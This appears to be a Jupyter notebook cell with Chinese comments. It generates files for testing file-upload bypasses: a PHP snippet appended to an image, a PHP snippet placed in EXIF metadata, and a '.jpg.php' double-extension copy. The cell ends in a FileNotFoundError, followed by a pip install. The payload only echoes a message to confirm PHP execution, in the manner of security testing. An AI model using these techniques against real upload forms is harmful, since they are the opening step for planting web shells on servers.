In [ ]:
import os
from PIL import Image
import piexif
import shutil

# payload: 不危害，仅用于测试 PHP 是否被解析
php_payload = '<?php echo "Upload successful. PHP parsed!"; ?>'

# 真实图片路径（你要提供一张 real.jpg）
source_img = "../../image.png"
output_dir = "bypass_upload_real_img"
os.makedirs(output_dir, exist_ok=True)

# 1. 尾部注入型
def append_php_to_image():
    with open(source_img, "rb") as f:
        img_data = f.read()
    with open(os.path.join(output_dir, "real_appended.php"), "wb") as f:
        f.write(img_data + b"\n" + php_payload.encode())

# 2. EXIF注入型
def inject_php_to_exif():
    image = Image.open(source_img)
    exif_dict = {"0th": {piexif.ImageIFD.ImageDescription: php_payload.encode("utf-8")}}
    exif_bytes = piexif.dump(exif_dict)
    image.save(os.path.join(output_dir, "real_exif.jpg"), "jpeg", exif=exif_bytes)

# 3. 修改扩展名
def copy_as_php_extension():
    shutil.copy(source_img, os.path.join(output_dir, "real.jpg.php"))

append_php_to_image()
inject_php_to_exif()
copy_as_php_extension()

print("✅ 已生成真实图片融合 PHP 的测试文件，保存路径：", output_dir)


FileNotFoundError: [Errno 2] No such file or directory: '../image.png'

In [3]:
!pip install piexif